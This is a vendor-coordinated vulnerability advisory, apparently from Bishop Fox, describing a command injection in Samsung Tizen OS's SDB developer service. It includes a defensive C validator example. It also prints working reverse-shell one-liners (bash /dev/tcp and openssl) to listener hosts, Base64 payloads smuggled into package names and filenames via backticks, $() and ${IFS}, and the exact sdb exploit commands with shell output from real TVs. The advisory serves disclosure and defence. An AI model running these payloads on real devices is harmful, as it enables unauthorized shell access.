
Samsung Tizen OS | Version Through 9.0


The following document describes identified vulnerabilities in the Samsung Tizen operating system up to and including version 9.0.

Product Vendor

Samsung

Product Description

Tizen is a Linux-based, open-source operating system used in a variety of mobile and smart devices, developed and primarily used by Samsung. The project’s official website is tizen.org. The latest version of the operating system is 9.0, which began rolling out in October 2024.

Vulnerabilities List

One vulnerability was identified within the Tizen OS platform:

  • Arbitrary Command Injection

    This vulnerability is described in the following section.

    Affected Version

    Versions through 9.0.

    Summary of Findings

    Bishop Fox staff identified one vulnerability in Samsung Tizen OS. This vulnerability could allow users of Samsung smart televisions running Tizen OS to execute arbitrary code at an operating system (OS) level on the devices.

    Exploiting the vulnerability required that the smart television (TV) have developer mode enabled and that the exploitation be performed from the IP address configured as the developer-mode host IP on the smart TV, which in practice requires close proximity to the television.

    Bishop Fox staff demonstrated that the issue was exploitable in Tizen OS versions 5.5, 7.0, 8.0, and 9.0. Bishop Fox staff did not test other Tizen OS releases but believe all Tizen OS versions that support the Samsung Debug Bridge (SDB) developer tool are likely to be affected.

    Impact

    While this issue presents minimal direct risk, it nevertheless allows for the circumvention of controls that Samsung uses to restrict operating system access on Tizen-based smart televisions. Samsung’s branded Tizen images are configured to prevent device owners and users from accessing the underlying operating system. The identified vulnerability demonstrates that these controls can be bypassed, indicating that the intended security boundary is not fully enforced as designed.

    Although exploitation requires developer mode to be enabled and the attacker to operate from the configured developer host IP (conditions that limit opportunistic abuse), the presence of OS-level command execution capability expands the theoretical attack surface of the device. Smart televisions are frequently deployed as shared, network-connected devices in corporate offices, conference rooms, healthcare facilities, hospitality environments, educational institutions, and other public or semi-public settings. In such environments, physical proximity and shared network access are more plausible than in private home use.

    Even with Samsung’s additional operating system protections and application signature enforcement in place, arbitrary command execution may provide an opportunity for further experimentation, reconnaissance, or chaining with other vulnerabilities. While no direct access to sensitive user data or application compromise was identified during testing, the ability to execute commands at the operating system level may increase exposure if combined with additional weaknesses or misconfigurations in enterprise network environments.

    Solution

    Update when a patch is available. For TVs located in public places or within range of public access, we recommend placing them into kiosk mode to prevent access to developer tools.

    Timeline

    • 02/18/2025: Initial discovery
    • 10/09/2025: Contact with vendor
    • 11/06/2025: Vendor acknowledged vulnerabilities
    • 02/24/2026: Vulnerabilities publicly disclosed

    Credits


    Samsung Tizen OS Through Version 9.0 — Vulnerabilities

    Arbitrary Command Injection

    Tizen OS was affected by an arbitrary command injection vulnerability wherein an attacker with access to a Tizen OS TV with developer mode enabled could inject arbitrary commands into the TV by running SDB installation commands with malicious package names.

    Vulnerability Details

    CVE ID: CVE coming soon (SVE-2025-50109)

    Vulnerability Type: Command Injection

    Access Vector: ☐ Remote, ☐ Local, ☒ Physical, ☐ Context dependent, ☐ Other (if other, please specify)

    Impact: ☒ Code execution, ☐ Denial of service, ☐ Escalation of privileges, ☐ Information disclosure, ☐ Other (if other, please specify)

    Security Risk: ☐ Critical, ☐ High, ☐ Medium, ☒ Low

    Vulnerability: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)

    Bishop Fox researchers determined that the Samsung Debug Bridge (SDB) service running on Tizen TV operating systems was susceptible to OS-level command injection from the IP address configured as the developer-mode host PC. The owner of a Samsung smart TV could exploit this issue to bypass security controls that Samsung implements in its branded Tizen OS images, including those running on physical smart TVs.

    In unbranded Tizen OS images, the SDB service allowed developers to access non-privileged or privileged OS shells using the sdb root on and sdb shell commands, as shown below:

    > .\sdb devices 
    List of devices attached 
    emulator-26101          device          T-8.0-x86_64 
    
    > .\sdb shell 
    sh-3.2$ whoami 
    owner 
    
    sh-3.2$ exit 
    
    > .\sdb root on 
    Switched to 'root' account mode 
    
    > .\sdb shell 
    root:~> whoami
    root

    FIGURE 1 – SDB shell access commands in use with an unbranded Tizen OS image

    However, in Samsung-branded Tizen OS images and physical Samsung smart TVs, the SDB service blocked access to OS shells, as shown below:

    > .\sdb devices 
    List of devices attached 
    emulator-26101          device          T-samsung-9.0-x86 
    
    > .\sdb shell 
    closed 
    closed 
    
    > .\sdb root on 
    Permission denied

    FIGURE 2 – Shell access denied by branded Tizen OS 9.0 image

    This indicated that Samsung wished to prevent developers and owners of Samsung smart TVs from accessing this functionality.

    Bishop Fox staff determined via packet capture that when using the sdb install command, the sdb utility used the shell command internally to trigger the installation process on the Tizen OS device. For example, when a developer executed the command sdb install test.tpk on the host PC, the sdb utility sent the following string to the SDB service on the Tizen OS device:

    shell:0 appinstall tpk test.tpk

    FIGURE 3 – Internal representation of TPK package installation command

    Bishop Fox staff discovered that the SDB service’s shell command invocation was vulnerable to OS command injection and could be exploited by using crafted sdb shell or sdb install commands.

    For example, Bishop Fox staff created a Base64-encoded version of the following payload, which executed a reverse TCP shell connection to port 49087 on a Linux VM with the IP address 10.1.10.161:

    bash -i >& /dev/tcp/10.1.10.161/49087 0>&1

    FIGURE 4 – Bash reverse TCP shell one-liner

    Bishop Fox staff determined that Windows PowerShell required extensive escaping of the necessary shell metacharacters, and executed the following commands to switch to the legacy Windows Command Prompt and exploit the command injection vulnerability:

    > cmd 
    Microsoft Windows [Version 10.0.26100.6584] 
    (c) Microsoft Corporation. All rights reserved. 
    
    >sdb shell "0 appinstall tpk test.tpk`echo${IFS}-n${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEwLjE2MS80OTA4NyAwPiYx'|base64${IFS}-d|bash`.tpk"

    FIGURE 5 – Executing encoded payload

    On the Linux VM, the waiting nc listener received the connection, as shown below:

    $ nc -nvlkp 49087 
    listening on [any] 49087 ... 
    connect to [10.1.10.161] from (UNKNOWN) [10.1.10.216] 57686 
    bash: no job control in this shell 
    bash: /root/.bashrc: Permission denied 
    bash-3.2$ whoami 
    sdk

    FIGURE 6 – Reverse shell connection from emulated Tizen OS device

    Bishop Fox staff determined that other shell metacharacters could also be used to inject OS commands against emulated devices, such as the following alternative syntax for the payload above:

    >sdb shell "0 appinstall tpk test.tpk$(echo${IFS}-n${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEwLjE2MS80OTA4NyAwPiYx'|base64${IFS}-d|bash).tpk"

    FIGURE 7 – Command injection using $() syntax instead of backticks
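    The request format in Figure 3 and the two injection syntaxes in Figures 5 and 7 share one root cause: the package name taken from the request is interpolated into a command line that a shell on the device then parses. The following is an added example written for this advisory, not Samsung or Tizen code; the function names, the allowlist, and the sample request lines are assumptions made here. It contrasts that interpolation pattern with a dispatcher that validates the name against an allowlist and passes it as a single argv entry, and reuses the same validator to flag suspicious requests in captured SDB traffic.

```c
/*
 * Added example for this advisory; not Samsung or Tizen code.
 * It models how a request in the Figure 3 format ("shell:0 appinstall tpk <name>")
 * can be dispatched without handing the package name to a shell. The function
 * names, the allowlist, and the sample request lines are assumptions made here.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAX_NAME 255

static const char REQUEST_PREFIX[] = "shell:0 appinstall tpk ";

/* Vulnerable pattern, shown for contrast only and never executed here:
 * the package name is pasted into a command line that a shell will parse,
 * so backticks, $( ), | and ${IFS} inside the name become commands. */
int build_command_line_vulnerable(const char *name, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "appinstall tpk %s", name); /* then system(out) */
    return n > 0 && (size_t)n < outlen;
}

/* Allowlist check for a package name: only [A-Za-z0-9._-], no leading '-' (would
 * read as an option) or '.', and a ".tpk" suffix. Every metacharacter used in
 * Figures 5 and 7 is outside this set. */
int is_safe_package_name(const char *name)
{
    size_t n = strlen(name);
    size_t i;
    if (n < 5 || n > MAX_NAME) return 0;
    if (name[0] == '-' || name[0] == '.') return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return strcmp(name + n - 4, ".tpk") == 0;
}

/* Hardened dispatch: parse the request, validate the name, and build an argv
 * for posix_spawn/execve. Because no shell is involved, the name stays a single
 * argument. Returns the argument count, or -1 for a malformed or unsafe request. */
int parse_install_request(const char *request, const char *argv[4],
                          char *storage, size_t storage_len)
{
    size_t plen = strlen(REQUEST_PREFIX);
    const char *name;
    if (strncmp(request, REQUEST_PREFIX, plen) != 0) return -1;
    name = request + plen;
    if (!is_safe_package_name(name)) return -1;
    if (strlen(name) + 1 > storage_len) return -1;
    strcpy(storage, name);
    argv[0] = "appinstall";
    argv[1] = "tpk";
    argv[2] = storage;
    argv[3] = NULL;
    return 3;
}

/* Convenience wrapper: 1 if the request would be dispatched, 0 if rejected. */
int request_is_accepted(const char *request)
{
    const char *argv[4];
    char storage[MAX_NAME + 1];
    return parse_install_request(request, argv, storage, sizeof storage) == 3;
}

/* Detection side: the same validator run over captured SDB request lines counts
 * every request the hardened dispatcher would reject. */
int count_suspicious_requests(const char *const lines[], int nlines)
{
    int i, hits = 0;
    for (i = 0; i < nlines; i++) {
        if (!request_is_accepted(lines[i])) hits++;
    }
    return hits;
}

/* Constructed sample capture: two benign installs and two injection attempts in
 * the backtick and $( ) forms. The Base64 text is a placeholder (it decodes to
 * "PLACEHOLDER"), not a payload. */
const char *const SAMPLE_REQUESTS[] = {
    "shell:0 appinstall tpk test.tpk",
    "shell:0 appinstall tpk test.tpk`echo${IFS}-n${IFS}'UExBQ0VIT0xERVI='|base64${IFS}-d|bash`.tpk",
    "shell:0 appinstall tpk my-app_1.2.tpk",
    "shell:0 appinstall tpk test.tpk$(id).tpk",
};
#define SAMPLE_COUNT ((int)(sizeof SAMPLE_REQUESTS / sizeof SAMPLE_REQUESTS[0]))

int main(void)
{
    char cmd[512];
    int i;
    for (i = 0; i < SAMPLE_COUNT; i++)
        printf("%-7s %s\n", request_is_accepted(SAMPLE_REQUESTS[i]) ? "ok" : "REJECT",
               SAMPLE_REQUESTS[i]);
    printf("%d suspicious request(s)\n",
           count_suspicious_requests(SAMPLE_REQUESTS, SAMPLE_COUNT));
    /* What the vulnerable pattern would have handed to a shell for sample 4. */
    if (build_command_line_vulnerable("test.tpk$(id).tpk", cmd, sizeof cmd))
        printf("vulnerable pattern builds: %s\n", cmd);
    return 0;
}
```

    The point of the argv-based dispatch is that validation becomes defence in depth rather than the only barrier: even a name that slipped past the allowlist would reach the installer as one argument and never be parsed by a shell. The same allowlist applied on the host side, to the filename given to sdb install, would reject the crafted name in Figure 9, but the device is where the boundary has to hold.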

    Bishop Fox staff found that exploiting the issue via the sdb install command required creating a file on the host PC whose name contained the necessary Linux shell metacharacters. For example, Bishop Fox staff began with the following reverse shell payload based on the openssl binary:

    mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.227:80 > /tmp/s; rm /tmp/s

    FIGURE 8 – openssl reverse TCP shell one-liner

    Bishop Fox staff then created an empty file with the following name, which contained the necessary shell metacharacters and a Base64-encoded version of the payload:

    new2.tpk`echo${IFS}-n${IFS}bWtmaWZvIC90bXAvczsgL2Jpbi9zaCAtaSA8IC90bXAvcyAyPiYxIHwgb3BlbnNzbCBzX2NsaWVudCAtcXVpZXQgLWNvbm5lY3QgMTkyLjE2OC4xLjIyNzo4MCA+IC90bXAvczsgcm0gL3RtcC9z|base64${IFS}-d|bash`.tpk

    FIGURE 9 – Filename with command injection characters

    Bishop Fox staff then executed the encoded payload using the following command:

    sdb install new2.tpk`echo${IFS}-n${IFS}bWtmaWZvIC90bXAvczsgL2Jpbi9zaCAtaSA8IC90bXAvcyAyPiYxIHwgb3BlbnNzbCBzX2NsaWVudCAtcXVpZXQgLWNvbm5lY3QgMTkyLjE2OC4xLjIyNzo4MCA+IC90bXAvczsgcm0gL3RtcC9z|base64${IFS}-d|bash`.tpk

    FIGURE 10 – Exploitation via sdb install command

    To ensure that exposure was not limited to emulated devices, Bishop Fox staff demonstrated exploitation on three physical Samsung smart TVs:

    • A 2020 43” Samsung model UN43TU700DFXZA smart TV with Tizen 5.5
    • A 2022 55” Samsung model UN55CU7000 smart TV with Tizen 7.0
    • A 2024 55” Samsung model QN55Q60DAFXZA smart TV with a 2025 build of Tizen 8.0

    Bishop Fox staff first put each smart TV into developer mode using the instructions in the “Samsung Developer: Connecting Smart TV and Visual Studio” guide and configured the IP address of their laptop as the host PC IP.

    Bishop Fox staff executed the following commands to verify that SDB shell access was blocked and then to execute the Bash reverse TCP shell payload on the QN55Q60DAFXZA smart TV:

    >sdb connect 10.1.10.179 
    connecting to 10.1.10.179:26101 ... 
    connected to 10.1.10.179:26101 
    
    >sdb devices 
    List of devices attached 
    10.1.10.179:26101       device          QN55Q60DAFXZA 
    
    >sdb shell 
    closed 
    closed 
    
    >sdb root on 
    Permission denied 
    
    >sdb shell "0 appinstall tpk test.tpk$(echo${IFS}-n${IFS}'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEwLjE2MS80OTA4NyAwPiYx'|base64${IFS}-d|bash).tpk"

    FIGURE 11 – Exploitation of Samsung QN55Q60DAFXZA smart TV

    As shown below, the reverse shell connected, and Bishop Fox staff verified that the device was running a build of Tizen 8.0 from February 2025:

    $ nc -nvlkp 49087 
    listening on [any] 49087 ... 
    connect to [10.1.10.161] from (UNKNOWN) [10.1.10.179] 54960 
    bash: no job control in this shell 
    bash: /root/.bashrc: Permission denied 
    
    bash-3.2$ whoami 
    sdk 
    
    bash-3.2$ cat /etc/tizen-release 
    Tizen8/TV 8.0.0 (arm) 
    VERSION = 8.0.0 
    CODENAME = TSEVENDF 
    BUILD_ID=T-NKLDAKUC-REL-202502052157 
    
    bash-3.2$ cat /etc/tizen-build.conf 
    TZ_BUILD_RELEASE_NAME="Tizen8/TV" 
    TZ_BUILD_VERSION=8.0 
    TZ_BUILD_FULLVER=8.0.0 
    TZ_BUILD_RELEASE_TYPE=eng 
    TZ_BUILD_VARIANT=NONE 
    
    TZ_BUILD_PROFILE=tv 
    TZ_BUILD_PROJECT=TIZEN:8.0:Base:OSU 
    
    TZ_BUILD_VENDOR=tizen 
    TZ_BUILD_REPO=standard 
    TZ_BUILD_ARCH=arm 
    
    TZ_BUILD_ID=latest 
    TZ_BUILD_DATE=20250205_132718 
    TZ_BUILD_TIME=13:27:18 
    TZ_BUILD_TS=1738762038 
    …omitted for brevity…

    FIGURE 12 – Shell access on Samsung QN55Q60DAFXZA smart TV

    To demonstrate exploitation of the Samsung UN55U7000 smart TV, Bishop Fox staff used the crafted sdb install command, as shown below:

    $ ./sdb install new2.tpk`echo${IFS}-n${IFS}bWtmaWZvIC90bXAvczsgL2Jpbi9zaCAtaSA8IC90bXAvcyAyPiYxIHwgb3BlbnNzbCBzX2NsaWVudCAtcXVpZXQgLWNvbm5lY3QgMTkyLjE2OC4xLjIyNzo4MCA+IC90bXAvczsgcm0gL3RtcC9z|base64${IFS}-d|bash`.tpk 
    
    1 file(s) pushed. O file(s) skipped.

    FIGURE 13 – Running crafted SDB install command

    After executing the command, the team received a remote shell from the TV on an openssl listener established previously, as shown below:

    $ sudo openssl s_server -quiet -key key.pem -cert cert.pem -port 80 
    sh: no job control in this shell 
    sh-3.2$ whoami 
    sdk 
    sh-3.2$ uname -a 
    Linux Samsung 5.4.77 #1 SMP PREEMPT Sun Sep 22 15:53:00 UTC 2024 armv7l GNU/Linux

    FIGURE 14 – Receiving a connection from the Samsung TV


    As indicated in the summary of this report, this finding is not indicative of widespread active exploitation and does not represent a high-severity remote compromise scenario. However, because the vulnerability undermines a deliberate platform restriction intended to prevent OS-level access, and because these devices are widely deployed in shared and business environments, transparency is warranted. Public disclosure enables organizations to make informed decisions regarding network segmentation, device configuration (such as disabling developer mode), and use of kiosk mode in publicly accessible deployments.
